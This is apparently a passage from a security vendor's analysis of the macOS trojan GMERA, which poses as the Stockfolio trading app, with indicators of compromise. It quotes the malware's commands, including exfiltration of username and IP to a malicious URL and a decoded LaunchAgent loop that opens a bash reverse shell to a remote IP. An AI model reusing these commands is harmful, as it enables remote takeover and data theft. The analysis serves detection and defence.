Once opened, Trojan.MacOS.GMERA.B will execute the embedded copy of Stockfolio version 1.4.13, after which it will launch the shell script run.sh.
The script run.sh collects the username and IP address of the infected machine via the following commands:
- username = 'whoami'
- ip address = 'curl -s ipecho.net/plain'
It connects to the malware URL hxxp://owpqkszz[.]info to send the username and IP address information using the following format:
- hxxp://owpqkszz[.]info/link.php?{username}&{ip address}
As part of its routine, the malware also drops the following files:
File | Details |
--- | --- |
/private/tmp/.com.apple.upd.plist | Copy of ~/Library/LaunchAgents/.com.apple.upd.plist |
~/Library/LaunchAgents/.com.apple.upd.plist | Persistence mechanism |
/tmp/loglog | Malware execution logs |
Figure 9. Content of the run.sh shell script
One of the primary changes found in the second variant, aside from the simplified routine, is the presence of a persistence mechanism via the creation of a property list (plist) file: ~/Library/LaunchAgents/.com.apple.upd.plist.
Figure 10. Hidden plist file used for persistence
After we decoded the base64-encoded arguments of the plist file, we found the following code:
- while :; do sleep 10000; screen -X quit; lsof -ti :25733 | xargs kill -9; screen -d -m bash -c 'bash -i >/dev/tcp/193.37.212.176/25733 0>&1'; done
This code, run by the launch agent, constantly re-creates the reverse shell mentioned earlier, repeating every 10,000 seconds.
The simple reverse shell created was observed to use the ports 25733-25736.
Conclusion
Given the changes we’ve seen from the malware variant’s initial iteration to its current one, we notice a trend in which the malware authors have simplified its routine and added further capabilities. It’s possible that the people behind it are looking for ways to make it more efficient – perhaps even adding evasion mechanisms in the future.
In the meantime, we advise aspiring traders to practice caution when it comes to the programs they download, especially if it comes from an unknown or suspicious website. We recommend that users only download apps from official sources to minimize chances of downloading a malicious one.
We reached out to Apple before publication of this entry, and they informed us that the code signing certificate of this fake app’s developers was revoked in July of this year.
Trend Micro solutions
End users can benefit from security solutions such as Trend Micro Home Security for Mac, which provides comprehensive security and multi-device protection against cyberthreats. Enterprises can benefit from Trend Micro’s Smart Protection Suites with XGen™ security, which infuses high-fidelity machine learning into a blend of threat protection techniques to eliminate security gaps across any user activity and any endpoint.
Indicators of Compromise (IoCs)
Sample 1
Filename | SHA256 | Detection name |
--- | --- | --- |
plugin | 6fe741ef057d38dd6d9bbe02dacbcb4940dac6c32e0f50a641e73727d6bf60d9 | Trojan.SH.GMERA.A |
stock | 6f48ef0d76ce68bbca53b05d2d22031aec5ce997e7227c3dcb20809959680f11 | Trojan.SH.GMERA.A |
Stockfoli | efd5b96f489f934f2465a185e43fddf50fcde51b12a8fb91d5d93b09a21706c7 | Trojan.MacOS.GMERA.A |
Trial_Stockfoli.zip | 18e1db7c37a63d987a5448b4dd25103c8053799b0deea5f45f00ca094afe2fe7 | Trojan.MacOS.GMERA.A |
Sample 2
Filename | SHA256 | Detection name |
--- | --- | --- |
com.apple.upd.plist | be8b6549da925f285307b17c616a010a9418af70d090ed960ade575ce27c7787 | Trojan.MacOS.GMERA.B |
run.sh | d50f5e94f2c417623c5f573963cc777c0676cc7245d65967ca09a53f464d2b50 | Trojan.SH.GMERA.B |
Stockfoli | 83df2f39140679a9cfb55f9c839ff8e7638ba29dba164900f9c77bb177796e03 (sample 2) | Trojan.MacOS.GMERA.B |
Trial_Stockfoli.zip | faa2799751582b8829c61cbfe2cbaf3e792960835884b61046778d17937520f4 (sample 2) | Trojan.MacOS.GMERA.B |